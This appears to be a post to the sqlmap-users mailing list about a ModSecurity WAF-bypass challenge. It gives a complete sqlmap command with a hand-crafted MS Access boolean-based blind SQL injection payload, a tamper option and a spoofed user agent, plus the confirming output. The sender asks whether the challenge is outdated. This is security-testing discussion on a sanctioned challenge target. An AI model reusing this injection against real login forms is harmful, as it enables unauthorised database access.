Heya,
I had some time to play arround with and old medsecurity challange here:
http://www.modsecurity.org/zero.webappsecurity.com/
I did make this work under sqlmap:
python ./sqlmap.py -u "
http://www.modsecurity.org/zero.webappsecurity.com/login1.asp"; --data
"login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
--string "Object moved" --technique "b" --dbms "msaccess" --tamper
"space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:21.0) Gecko/20100101 Firefox/21.0"
I had to remove %0C from space2randomblank to make this work.
Response:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
--
Is the challange way outdated or something I do wrong?
M
------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
